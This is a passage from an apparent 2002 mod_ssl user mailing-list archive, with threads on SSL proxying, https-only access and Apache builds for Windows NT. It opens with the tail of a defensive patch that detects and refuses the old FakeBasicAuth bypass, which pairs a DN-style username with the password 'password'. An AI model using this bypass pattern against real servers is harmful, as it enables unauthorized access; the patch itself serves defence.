"password" as the > * password. > */ > if ((cpAL = ap_table_get(r->headers_in, "Authorization")) != NULL) { > if (strcEQ(ap_getword(r->pool, &cpAL, ' '), "Basic")) { > while (*cpAL == ' ' || *cpAL == '\t') > cpAL++; > cpAL = ap_pbase64decode(r->pool, cpAL); > cpUN = ap_getword_nulls(r->pool, &cpAL, ':'); > cpPW = cpAL; > if (cpUN[0] == '/' && strEQ(cpPW, "password")) > { > ssl_log(r->server, SSL_LOG_INFO, "WARNING: Old mod_ssl breakthrough solicited (FakeBasicAuth by DN) !"); > return FORBIDDEN; > } > } > } 1159a1163 > } 1160a1165 > --snip ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 18 17:56:54 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA25602; Thu, 18 Apr 2002 17:55:46 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id RAA25194; Thu, 18 Apr 2002 17:50:14 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id AA73F4CE734; Thu, 18 Apr 2002 17:50:10 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g3IFgQa32586; Thu, 18 Apr 2002 17:42:26 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from harrier.csrv.uidaho.edu id EAA29003; Thu, 18 Apr 2002 04:33:35 +0200 (MET DST) From: abce1234@email.com Received: from griffin (griffin.csds.uidaho.edu [129.101.154.86]) by harrier.csrv.uidaho.edu (8.9.3 (PHNE_22672)/) with SMTP id TAA17583 for ; Wed, 17 Apr 2002 19:33:28 -0700 (PDT) Message-ID: <004301c1e682$13b2dab0$569a6581@csds.uidaho.edu> To: Subject: Double SSL connection with a proxy Date: Wed, 17 Apr 2002 19:38:08 -0700 Organization: abce1234@email.com MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0040_01C1E647.66EC1920" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: abce1234@email.com X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_0040_01C1E647.66EC1920 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi guys.. Any one has an idea how to configure apache + proxy_mod + ssl_mod to = have the following network configuration: Local (10.1.1.1) <=3D=3D=3D SSL(x) =3D=3D> [ Proxy 139.x.x.x] = <=3D=3D=3D=3D SSL(y) =3D=3D=3D> [HTTPS server 149.x.x.x] I want to hide the identity of Local machine, and when a Local machine = request a HHTPS connection to an outer server, then the Proxy will mimic = the request and request the data on the Client behalf using SSL = connection (SSL(y)). The proxy then decrypts the packet (for inspection) = and re-encrypts back using another SSL (x) connection to send it back to = Local machine. All machines are unix boxes. Any hint is highly appreciated.. Thanks :) ------=_NextPart_000_0040_01C1E647.66EC1920 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hi guys..
 
Any one has an idea how to configure = apache +=20 proxy_mod + ssl_mod to have the following network = configuration:
 
 
     Local = (10.1.1.1) =20 <=3D=3D=3D SSL(x) =3D=3D>  [ Proxy 139.x.x.x] = <=3D=3D=3D=3D SSL(y) =3D=3D=3D> [HTTPS=20 server 149.x.x.x]
 
I want to hide the identity of Local = machine, and=20 when a Local machine request a HHTPS connection to an outer server, then = the=20 Proxy will mimic the request and request the data on the Client behalf = using SSL=20 connection (SSL(y)). The proxy then decrypts the packet (for inspection) = and=20 re-encrypts back using another SSL (x) connection to send it back to = Local=20 machine. All machines are unix boxes.
 
Any hint is highly = appreciated..
 
Thanks =20 :)
------=_NextPart_000_0040_01C1E647.66EC1920-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 18 18:48:25 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA01442; Thu, 18 Apr 2002 18:47:39 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ns1.microanswers.net id SAA01375; Thu, 18 Apr 2002 18:46:38 +0200 (MET DST) Received: from ws1 (microanswers.net [63.230.56.77] (may be forged)) by ns1.microanswers.net (8.11.0/8.11.0) with SMTP id g3IGV4R02694 for ; Thu, 18 Apr 2002 11:31:04 -0500 Message-ID: <001a01c1e6f8$779c62a0$4d38e63f@microanswers.net> From: "Andrew Lietzow" To: References: <3CBEBDE8.5080509@web.de> Subject: Re: searching for Windows NT binary of Apache 2.0.35 with mod_ssl Date: Thu, 18 Apr 2002 11:45:37 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Andrew Lietzow" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Johannes, RE:>>Before I try further to compile the stuff by my own ... RE:>>Currently there is only a non-ssl-version: > apache_2.0.35-win32-x86-no_ssl.msi > http://www.apache.org/dist/httpd/binaries/win32/#stable > This version is only available at present in a -no_ssl flavor, > due to > ongoing questions of strong crypto restrictions. > (??? sources are available - but the binary not ???) already successful? Can't tell you much about a binary for NT. That's probably quite low on the marketing development list as there are not too many Apaches running on NT. (Please point me to marketing data, should I be incorrect in this statement). I'm surprised they invest any time at all, let alone developing a binary. I do know that it compiled quite nicely on SuSE 7.3 Linux with only two tries. I have pulled a little hair out in the past, with some lower level versions, but IMO, the new 2.0.35 is very easy to install with mod_ssl enabled, on a platform where it will plug-n-play. So, if you get tired with Win NT, for about 80-160 bucks you can come back from the dark side... The porters can help you, because they are very patient souls who want to see the market expand for Apache and mod_ssl. However, I'm unable to do more than to point you to a solution that I know works well, right out of the tarball... I wish you well. Andrew Lietzow The ACL Group, Inc. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 18 18:55:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA01923; Thu, 18 Apr 2002 18:54:27 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from web12701.mail.yahoo.com id SAA01876; Thu, 18 Apr 2002 18:53:19 +0200 (MET DST) Message-ID: <20020418165317.84003.qmail@web12701.mail.yahoo.com> Received: from [156.153.255.236] by web12701.mail.yahoo.com via HTTP; Thu, 18 Apr 2002 09:53:17 PDT Date: Thu, 18 Apr 2002 09:53:17 -0700 (PDT) From: Anbuchezhian Chelliah Subject: SSLProxyxx directives To: modssl-users@modssl.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Anbuchezhian Chelliah X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello All, I just want to know more about SSLProxyxxx directives( though they are experimental). The situation I am facing is like the one below: If there is a https connection from an apache proxy server -> backend server and if the backend server asks the apache proxy server to authenticate itself to the backend server, is there a directive in httpd.conf file of the proxy server to store its client certificate that can be used to authenticate itself to the backend server. Thanks in advance to all of you Regards, Anbu __________________________________________________ Do You Yahoo!? Yahoo! Tax Center - online filing with TurboTax http://taxes.yahoo.com/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 18 19:02:21 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA02478; Thu, 18 Apr 2002 19:01:24 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id TAA02410; Thu, 18 Apr 2002 19:00:13 +0200 (MET DST) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g3IGwEZ21466 for ; Thu, 18 Apr 2002 12:58:14 -0400 Date: Thu, 18 Apr 2002 12:58:14 -0400 (EDT) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org Subject: Re: searching for Windows NT binary of Apache 2.0.35 with mod_ssl In-Reply-To: <3CBEBDE8.5080509@web.de> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, 18 Apr 2002, Johannes Artur Bertscheit wrote: > and I tried to compile the soruces with Visual C++ 6.0 without success > (strange compilation errors occured). Which errors? You do realize that you need sed installed to compile it, right? See http://apr.apache.org/compiling_win32.html for tips. --Cliff ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 18 19:10:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA03191; Thu, 18 Apr 2002 19:09:13 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from atlanta.pop3now.com id TAA03161; Thu, 18 Apr 2002 19:08:40 +0200 (MET DST) From: rmckeever@earthlink.net Received: (from nobody@localhost) by atlanta.pop3now.com (8.11.2/8.11.2) id g3IH7nG09006; Thu, 18 Apr 2002 13:07:49 -0400 Date: Thu, 18 Apr 2002 13:07:49 -0400 Message-Id: <200204181707.g3IH7nG09006@atlanta.pop3now.com> To: modssl-users@modssl.org Subject: http and https Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: rmckeever@earthlink.net X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, I have the following config: Apache/1.3.23 (Unix) mod_ssl/2.8.7 OpenSSL/0.9.6 I notice that if i enter: https://server/www/index.php it works great. Now if if I enter this http://server/www/index.php I get to the same location and it is not SSL secured???? So my question is can you turn off access to http? Thanks, Ron -- Pop3Now Personal, Get quick remote access to your email accounts! Sign Up Now! Visit http://www.pop3now.com/personal ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 18 19:15:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA03646; Thu, 18 Apr 2002 19:14:13 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id TAA03628; Thu, 18 Apr 2002 19:13:49 +0200 (MET DST) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g3IHBoV21493 for ; Thu, 18 Apr 2002 13:11:50 -0400 Date: Thu, 18 Apr 2002 13:11:50 -0400 (EDT) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org Subject: Re: http and https In-Reply-To: <200204181707.g3IH7nG09006@atlanta.pop3now.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, 18 Apr 2002 rmckeever@earthlink.net wrote: > Now if if I enter this > http://server/www/index.php > I get to the same location and it is not SSL secured???? > So my question is can you turn off access to http? See the SSLRequireSSL directive. Or you might want to set up a Redirect so that the client is automatically sent over to the https side. --Cliff ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 18 19:16:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA03707; Thu, 18 Apr 2002 19:15:16 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id TAA03666; Thu, 18 Apr 2002 19:14:54 +0200 (MET DST) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id MAA03512 for ; Thu, 18 Apr 2002 12:19:51 -0400 Date: Thu, 18 Apr 2002 12:19:51 -0400 (EDT) From: "R. DuFresne" To: modssl-users@modssl.org Subject: Re: http and https In-Reply-To: <200204181707.g3IH7nG09006@atlanta.pop3now.com> Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users yes, remove and directives in http.conf for port 80 and just keep the port 443 stuff. Thanks, Ron Dufresne On Thu, 18 Apr 2002 rmckeever@earthlink.net wrote: > Hello, > > I have the following config: > Apache/1.3.23 (Unix) mod_ssl/2.8.7 OpenSSL/0.9.6 > > I notice that if i enter: > https://server/www/index.php > > it works great. > > Now if if I enter this > http://server/www/index.php > > I get to the same location and it is not SSL secured???? > > So my question is can you turn off access to http? > Thanks, > Ron > > > -- > Pop3Now Personal, Get quick remote access to your email accounts! > Sign Up Now! Visit http://www.pop3now.com/personal > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 18 19:42:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA05070; Thu, 18 Apr 2002 19:41:21 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from www.dicecorp.com id TAA05010; Thu, 18 Apr 2002 19:40:28 +0200 (MET DST) Received: from DRAGON (internal154.dicecorp.com [192.168.100.154]) by www.dicecorp.com (8.11.1/8.11.1) with ESMTP id g3IHeQH12253 for ; Thu, 18 Apr 2002 13:40:26 -0400 From: "Jeremy Walton" To: Subject: RE: http and https Date: Thu, 18 Apr 2002 13:40:35 -0400 Message-ID: <002501c1e700$25c26e40$9a64a8c0@DRAGON> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 In-Reply-To: <200204181707.g3IH7nG09006@atlanta.pop3now.com> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Jeremy Walton" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users In the eyes of apache. Https and http are different sites. If you open the ssl.conf file you'll see If you put a DocumentRoot of the one you have in http... And change the one you have in httpd.conf.. You should have one site that's not secure and one that is. Now you can have general pages and secure pages. Jeremy Walton DICE Corporation -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of rmckeever@earthlink.net Sent: Thursday, April 18, 2002 1:08 PM To: modssl-users@modssl.org Subject: http and https Hello, I have the following config: Apache/1.3.23 (Unix) mod_ssl/2.8.7 OpenSSL/0.9.6 I notice that if i enter: https://server/www/index.php it works great. Now if if I enter this http://server/www/index.php I get to the same location and it is not SSL secured???? So my question is can you turn off access to http? Thanks, Ron -- Pop3Now Personal, Get quick remote access to your email accounts! Sign Up Now! Visit http://www.pop3now.com/personal ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 18 19:50:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA06200; Thu, 18 Apr 2002 19:48:36 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id TAA06028; Thu, 18 Apr 2002 19:47:48 +0200 (MET DST) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id MAA03653 for ; Thu, 18 Apr 2002 12:52:35 -0400 Date: Thu, 18 Apr 2002 12:52:35 -0400 (EDT) From: "R. DuFresne" To: modssl-users@modssl.org Subject: Re: http and https In-Reply-To: Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Would this not still leave port 80 open and bound? Is not just removing the port delcarations for 80 and only having 443 set better and perhaps more secure? Thanks, Ron DuFresne On Thu, 18 Apr 2002, Cliff Woolley wrote: > On Thu, 18 Apr 2002 rmckeever@earthlink.net wrote: > > > Now if if I enter this > > http://server/www/index.php > > I get to the same location and it is not SSL secured???? > > So my question is can you turn off access to http? > > See the SSLRequireSSL directive. Or you might want to set up a Redirect > so that the client is automatically sent over to the https side. > > --Cliff > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 18 20:00:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA07067; Thu, 18 Apr 2002 19:59:22 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id TAA07050; Thu, 18 Apr 2002 19:59:03 +0200 (MET DST) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g3IHv3Y17533 for ; Thu, 18 Apr 2002 13:57:03 -0400 Date: Thu, 18 Apr 2002 13:57:03 -0400 (EDT) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org Subject: Re: http and https In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, 18 Apr 2002, R. DuFresne wrote: > Would this not still leave port 80 open and bound? It would, yes. > Is not just removing the port delcarations for 80 and only having 443 > set better and perhaps more secure? That's a case-by-case decision. In some cases, it would be insufficiently secure to leave open port 80 (as when the initial request contains privileged information). In other cases, it's only the response or subsequent requests that are privileged, so it's okay to let the initial request come in on port 80 as long as you immediately bounce them over to https. In that situation, leaving port 80 open is just a convenience for your users (in case they type http: by mistake), if you deem it safe to provide that convenience. --Cliff ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 18 21:30:20 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA13921; Thu, 18 Apr 2002 21:29:44 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id VAA13853; Thu, 18 Apr 2002 21:28:28 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 091AA4CE734; Thu, 18 Apr 2002 21:28:27 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g3IJOxP38067; Thu, 18 Apr 2002 21:24:59 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mailout04.sul.t-online.com id UAA07253; Thu, 18 Apr 2002 20:01:46 +0200 (MET DST) Received: from fwd04.sul.t-online.de by mailout04.sul.t-online.com with smtp id 16yGDx-0001zp-0A; Thu, 18 Apr 2002 20:01:37 +0200 Received: from web.de (0821523378-0001@[217.233.183.97]) by fwd04.sul.t-online.com with esmtp id 16yGDn-1v03EWC; Thu, 18 Apr 2002 20:01:27 +0200 Message-ID: <3CBF09F6.3060206@web.de> Date: Thu, 18 Apr 2002 20:01:26 +0200 From: Johann.Bertscheit@t-online.de (Johannes Artur Bertscheit) User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; de-DE; rv:0.9.4) Gecko/20011019 Netscape6/6.2 X-Accept-Language: de-DE MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: searching for Windows NT binary of Apache 2.0.35 with mod_ssl References: <3CBEBDE8.5080509@web.de> <001a01c1e6f8$779c62a0$4d38e63f@microanswers.net> Content-Type: multipart/alternative; boundary="------------080700000507010401030907" X-Sender: 0821523378-0001@t-dialin.net Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Johann.Bertscheit@t-online.de (Johannes Artur Bertscheit) X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --------------080700000507010401030907 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Andrew Lietzow wrote: >Can't tell you much about a binary for NT. That's probably quite low on the >marketing development list as there are not too many >Apaches running on NT. > Apache 2.0 is annouced to work on windows NT - including SSL: "This version of Apache is known to work on ... Windows.... the initial release of Apache is expected to perform equally well on all supported platforms." http://searchwebmanagement.techtarget.com/originalContent/0,289142,sid27_gci817631,00.html "Apache 2.0 - A threat to Microsoft's IIS? By Karen Guglielmo, site editor - 17 Apr 2002, SearchWebManagement Experts agree that one of the biggest improvements to the latest release of Apache 2.0 is its compatibility with Windows" "The GA version of Apache 2. 0 [running on Windows] is equal in performance to IIS running on Windows. The performance wasn't there before. It wasn't an intuitive interface to use Apache on Windows." "Another visible improvement to Apache 2.0 is its SSL support. With version 1.3, getting SSL support was very difficult. However, with 2.0, it's included, right out of the box. " >(Please point me to marketing data, should I be >incorrect in this statement). I'm surprised they invest any time at all, >let alone developing a binary. > Please look http://www.securityspace.com/s_survey/sdata/200203/index.html there you can see (for https-servers): Apache has 53.33% Microsoft has 29.89% So I think almost 30% with hosts running windows is a not so tiny market for a apache running on windows. >I do know that it compiled quite nicely on SuSE 7.3 Linux with only two >tries. I have pulled a little hair out in the past, with some lower level >versions, but IMO, the new 2.0.35 is very easy to install with mod_ssl >enabled, on a platform where it will plug-n-play. So, if you get tired >with Win NT, for about 80-160 bucks you can come back from the dark side... > I have no choice - I must use windows NT - because of the customer / the project. I would appreciate to work on LINUX but I CAN NOT ! >The porters can help you, because they are very patient souls who want to >see the market expand for Apache and mod_ssl. > So maybe one of the windows porters has available one binary of the stuff they ported? Johannes --------------080700000507010401030907 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit Andrew Lietzow wrote:
Can't tell you much about a binary for NT.  That's probably quite low on the
marketing development list as there are not too many
Apaches running on NT.
Apache 2.0 is annouced to work on windows NT - including SSL:

"This version of Apache is known to work on ... Windows....
 the initial release of Apache is expected to perform equally well on all supported platforms."

http://searchwebmanagement.techtarget.com/originalContent/0,289142,sid27_gci817631,00.html
"Apache 2.0 - A threat to Microsoft's IIS?
By Karen Guglielmo, site editor - 17 Apr 2002, SearchWebManagement
Experts agree that one of the biggest improvements to the latest release of Apache 2.0 is its compatibility with Windows"
"The GA version of Apache 2. 0 [running on Windows] is equal in performance to IIS running on Windows. The performance wasn't there before. It wasn't an intuitive interface to use Apache on Windows."
"Another visible improvement to Apache 2.0 is its SSL support. With version 1.3, getting SSL support was very difficult. However, with 2.0, it's included, right out of the box. "


(Please point me to marketing data, should I be
incorrect in this statement).  I'm surprised they invest any time at all,
let alone developing a binary.
Please look
http://www.securityspace.com/s_survey/sdata/200203/index.html
there you can see (for https-servers):
Apache has 53.33%
Microsoft has 29.89%
So I think almost 30% with hosts running windows is a not so tiny market for a apache running on windows.
I do know that it compiled quite nicely on SuSE 7.3 Linux with only two
tries.  I have pulled a little hair out in the past, with some lower level
versions, but IMO, the new 2.0.35 is very easy to install with mod_ssl
enabled, on a platform where it will plug-n-play.    So, if  you get tired
with Win NT, for about 80-160 bucks you can come back from the dark side...
I have no choice - I must use windows NT - because of the customer / the project.

I would appreciate to work on LINUX but I CAN NOT !
The porters can help you, because they are very patient souls who want to
see the market expand for Apache and mod_ssl.
So maybe one of the windows porters has available one binary of the stuff they ported?


Johannes


          

          

          
          

--------------080700000507010401030907--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 18 22:28:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA18116; Thu, 18 Apr 2002 22:27:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.espgroup.net id WAA18094; Thu, 18 Apr 2002 22:26:50 +0200 (MET DST)
Received: from no.name.available by mail.espgroup.net
          via smtpd (for opensource-01.ee.ethz.ch [129.132.7.153]) with SMTP; 18 Apr 2002 20:18:08 UT
Received: (private information removed)
Received: from no.name.available by brickwall.espgroup.net
          via smtpd (for [10.3.1.2]) with SMTP; 18 Apr 2002 20:18:07 UT
Message-ID: <3CBF2CE5.4000001@espgroup.net>
Date: Thu, 18 Apr 2002 16:30:29 -0400
From: "Dwayne Miller" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.9) Gecko/20020311
X-Accept-Language: en,pdf
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: searching for Windows NT binary of Apache 2.0.35 with mod_ssl
References: <3CBEBDE8.5080509@web.de> <001a01c1e6f8$779c62a0$4d38e63f@microanswers.net> <3CBF09F6.3060206@web.de>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dwayne Miller" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

There was a problem with the SSL code released with 2.0.35.  I'd wait 
for 2.0.36 as it has been fixed there.  I believe also that someone was 
testing the Windows Installer setup for 2.0.x.  Maybe on the next round, 
SSL will be installed and you can configure them post installation...

Johannes Artur Bertscheit wrote:

> Andrew Lietzow wrote:
>
>>Can't tell you much about a binary for NT.  That's probably quite low on the
>>marketing development list as there are not too many
>>Apaches running on NT.  
>>
> Apache 2.0 is annouced to work on windows NT - including SSL:
>
> "This version of Apache is known to work on ... Windows....
>  the initial release of Apache is expected to perform equally well on 
> all supported platforms."
>
> http://searchwebmanagement.techtarget.com/originalContent/0,289142,sid27_gci817631,00.html
> *"Apache 2.0 - A threat to Microsoft's IIS?*
> By *Karen Guglielmo, site editor - 17 Apr 2002, **SearchWebManagement*
> Experts agree that one of the biggest improvements to the latest 
> release of Apache 2.0 is its compatibility with Windows"
> "The GA version of Apache 2. 0 [running on Windows] is equal in 
> performance to IIS running on Windows. The performance wasn't there 
> before. It wasn't an intuitive interface to use Apache on Windows."
> "Another visible improvement to Apache 2.0 is its SSL support. With 
> version 1.3, getting SSL support was very difficult. However, with 
> 2.0, it's included, right out of the box. "
>
>
>>(Please point me to marketing data, should I be
>>incorrect in this statement).  I'm surprised they invest any time at all,
>>let alone developing a binary.
>>
> Please look
> http://www.securityspace.com/s_survey/sdata/200203/index.html
> there you can see (for https-servers):
> Apache has 53.33%
> Microsoft has 29.89%
> So I think almost 30% with hosts running windows is a not so tiny 
> market for a apache running on windows.
>
>>I do know that it compiled quite nicely on SuSE 7.3 Linux with only two
>>tries.  I have pulled a little hair out in the past, with some lower level
>>versions, but IMO, the new 2.0.35 is very easy to install with mod_ssl
>>enabled, on a platform where it will plug-n-play.    So, if  you get tired
